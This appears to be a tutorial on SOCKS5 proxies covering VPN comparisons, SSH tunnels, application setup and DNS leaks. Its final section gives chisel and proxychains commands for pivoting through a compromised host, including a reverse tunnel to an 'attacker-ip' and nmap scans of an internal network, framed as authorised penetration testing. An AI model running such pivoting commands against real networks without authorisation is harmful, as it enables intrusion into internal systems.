SOCKS5 proxies are a lightweight, protocol-agnostic way to route traffic through an intermediary server. They’re faster and more flexible than many VPN configurations, and they’re commonly used for torrenting, bypassing geo-restrictions, and application-specific routing when you don’t want to tunnel all traffic.
SOCKS5 vs. HTTP Proxy vs. VPN
| Feature | HTTP Proxy | SOCKS5 Proxy | VPN |
|---|---|---|---|
| Protocol support | HTTP/HTTPS only | Any TCP/UDP | All traffic |
| DNS leak protection | No | Depends on client | Yes (when configured) |
| Traffic encryption | No (HTTPS is encrypted by site) | No (proxy itself) | Yes |
| Authentication | Basic auth | Username/password | Credentials |
| Speed | Fast | Fast | Moderate overhead |
| System-wide routing | No | No (per-app) | Yes |
SOCKS5 is not a VPN replacement for privacy-critical use — it doesn’t encrypt traffic between you and the proxy server. SOCKS5’s strength is flexibility and speed for per-application routing.
How SOCKS5 Works
- Your application connects to the SOCKS5 proxy server (usually on port 1080)
- The proxy forwards your traffic to the destination
- The destination sees the proxy’s IP, not yours
- The proxy server sees your real IP but not the content (for HTTPS connections)
SOCKS5 adds username/password authentication and UDP support over the older SOCKS4.
Getting a SOCKS5 Proxy
From a VPN provider (recommended)
Most premium VPN providers include SOCKS5 proxy access:
- Mullvad VPN: includes SOCKS5 proxy at
socks5.mullvad.net:1080— requires a Mullvad account - ProtonVPN: SOCKS5 available on certain plans
- IPVanish, NordVPN, PIA: all offer SOCKS5 proxies
SSH SOCKS5 Tunnel (best for technical users)
If you have a remote VPS or server, create a SOCKS5 tunnel over SSH:
# Create a SOCKS5 proxy on localhost:1080 via SSH
ssh -D 1080 -C -N [email protected]
# Flags:
# -D 1080: Dynamic application-level port forwarding (SOCKS)
# -C: Compress traffic
# -N: Don't execute a remote command
# -q: Quiet mode (optional)
Your SSH traffic is encrypted between you and the server. Now configure apps to use 127.0.0.1:1080 as their SOCKS5 proxy.
Persistent tunnel with autossh:
autossh -M 0 -f -D 1080 -N [email protected]
Configuring SOCKS5 in Applications
Firefox
- Settings → General → Network Settings → Settings
- Select Manual proxy configuration
- SOCKS Host:
127.0.0.1, Port:1080 - Select SOCKS v5
- Check Proxy DNS when using SOCKS v5 — critical to prevent DNS leaks
qBittorrent (Torrent)
- Tools → Options → Connection
- Proxy Type: SOCKS5
- Host and port for your proxy
- Username/password if required
- Check Use proxy for peer connections and Disable connections not supported by proxies
curl / wget
# Use SOCKS5 for curl
curl --proxy socks5h://user:[email protected]:1080 https://example.com
# socks5h: DNS resolved by proxy (prevents DNS leak)
# socks5: DNS resolved locally (may leak)
Python requests
import requests
proxies = {
'http': 'socks5h://user:[email protected]:1080',
'https': 'socks5h://user:[email protected]:1080'
}
response = requests.get('https://example.com', proxies=proxies)
System-wide on Linux (proxychains)
# Install proxychains-ng
sudo apt install proxychains-ng
# Edit config
sudo nano /etc/proxychains4.conf
# Change last line to:
socks5 127.0.0.1 1080
# Route any program through the proxy
proxychains4 curl https://example.com
proxychains4 nmap -sT -Pn target.com
DNS Leaks with SOCKS5
If your application resolves DNS locally and then sends the IP to the SOCKS5 server, your DNS queries reveal your browsing activity. Always use SOCKS5h (hostname-mode) to have the proxy resolve DNS:
- In URLs:
socks5h://(h = hostname resolution by proxy) - In Firefox: check “Proxy DNS when using SOCKS v5”
- In curl: use
--proxy socks5h://notsocks5://
Verify: go to dnsleaktest.com with your proxy active.
SOCKS5 for Penetration Testing
In pentesting, SOCKS5 tunnels are used for pivoting — routing attack traffic through a compromised host to reach internal networks:
# chisel server on attacker
./chisel server --port 8080 --reverse
# chisel client on pivot host
./chisel client attacker-ip:8080 R:1080:socks
# Now use proxychains to reach internal network
proxychains4 nmap -sT 192.168.1.0/24
This is a legitimate technique in authorized penetration tests.
SOCKS5 is a versatile tool that belongs in any privacy or security toolkit. For maximum privacy, combine it with an encrypted SSH tunnel or VPN so the proxy operator can’t observe unencrypted traffic.